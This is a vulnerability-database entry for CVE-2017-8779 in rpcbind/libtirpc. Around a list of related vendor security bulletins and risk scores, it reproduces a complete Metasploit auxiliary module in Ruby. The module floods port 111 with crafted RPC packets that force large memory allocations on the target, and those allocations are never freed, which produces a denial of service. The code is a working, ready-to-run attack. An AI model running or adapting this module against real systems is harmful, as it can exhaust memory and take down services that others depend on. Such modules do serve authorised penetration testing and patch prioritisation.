RPC DoS targeting *nix rpcbind/libtirpc

🗓️ 05 Jun 2017 15:23:39Reported by guidovranken, Pearce Barry <[email protected]>Type

RPC DoS targeting *nix rpcbind/libtirpc. Exploits vulnerability to trigger large memory allocations

Reporter	Title	Published	Views	Family All 201
IBM Security Bulletins	Security Bulletin: A vulnerability in rpcbind affects PowerKVM	18 Jun 201801:36	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in coreutils, sudo, jasper, bind, bash, libtirpc, nss and nss-util affect IBM SmartCloud Entry	19 Jul 202000:49	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Guardium is affected by Open Source packages vulnerabilities	16 Jun 201822:04	–	ibm
IBM Security Bulletins	Security Bulletin: A vulnerability in libtirpc affects PowerKVM	18 Jun 201801:36	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerability in libtirpc affects Power Hardware Management Console (CVE-2017-8779)	23 Sep 202101:45	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows	25 Feb 201920:40	–	ibm
0day.today	RPCBind / libtirpc - Denial of Service Exploit	9 May 201700:00	–	zdt
Amazon	Important: libtirpc	6 Jun 201700:00	–	amazon
Amazon	Important: rpcbind	6 Jun 201700:00	–	amazon
Tenable Nessus	Amazon Linux AMI : libtirpc (ALAS-2017-840)	7 Jun 201700:00	–	nessus

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::UDPScanner

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'RPC DoS targeting *nix rpcbind/libtirpc',
      'Description' => %q{
        This module exploits a vulnerability in certain versions of
        rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
        large (and never freed) memory allocations for XDR strings on
        the target.
      },
      'Author'  =>
        [
          'guidovranken', # original code
          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2017-8779' ],
        [ 'BID', '98325' ],
        [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
      ],
      'Disclosure Date' => 'May 03 2017'))

    register_options([
      Opt::RPORT(111),
      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
    ])
  end

  def scan_host(ip)
    pkt = [
      0,        # xid
      0,        # message type CALL
      2,        # RPC version 2
      100000,   # Program
      4,        # Program version
      9,        # Procedure
      0,        # Credentials AUTH_NULL
      0,        # Credentials length 0
      0,        # Credentials AUTH_NULL
      0,        # Credentials length 0
      0,        # Program: 0
      0,        # Ver
      4,        # Proc
      4,        # Argument length
      datastore['ALLOCSIZE'] # Payload
    ].pack('N*')

    s = udp_socket(ip, datastore['RPORT'])
    count = 0
    while count < datastore['COUNT'] do
      begin
        s.send(pkt, 0)
      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
        vprint_error("Host #{ip} unreachable")
        break
      end
      count += 1
    end

    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
  end
end

24 Jul 2017 13:26Current

7.2High risk

Vulners AI Score7.2

CVSS 27.8

CVSS 37.5

EPSS0.81381